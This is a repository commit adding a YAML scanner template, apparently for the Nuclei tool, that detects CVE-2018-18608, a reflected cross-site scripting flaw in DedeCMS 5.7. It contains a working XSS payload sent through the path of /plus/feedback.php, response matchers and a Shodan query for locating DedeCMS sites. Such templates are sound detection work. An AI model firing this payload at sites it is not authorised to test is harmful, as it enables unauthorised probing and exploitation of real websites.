Merge pull request #4448 from ritikchaddha/patch-64

Create CVE-2018-18608.yaml
2022-05-20 00:36:36 +05:30 · 2022-05-20 00:36:36 +05:30 · e4b2765eaa
parent 4f819d9656 55ffddee9e
commit e4b2765eaa
1 changed files with 38 additions and 0 deletions
--- a/cves/2018/CVE-2018-18608.yaml
+++ b/cves/2018/CVE-2018-18608.yaml
@ -0,0 +1,38 @@
+id: CVE-2018-18608
+
+info:
+  name: DedeCMS V5.7 - Cross Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
+  reference:
+    - https://github.com/ky-j/dedecms/issues/8
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-18608
+  metadata:
+    verified: true
+    shodan-query: http.html:"DedeCms"
+  tags: dedecms,xss,cve,cve2018
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'><script>alert(document.domain)</script>"
+          - "DedeCMS Error Warning!"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200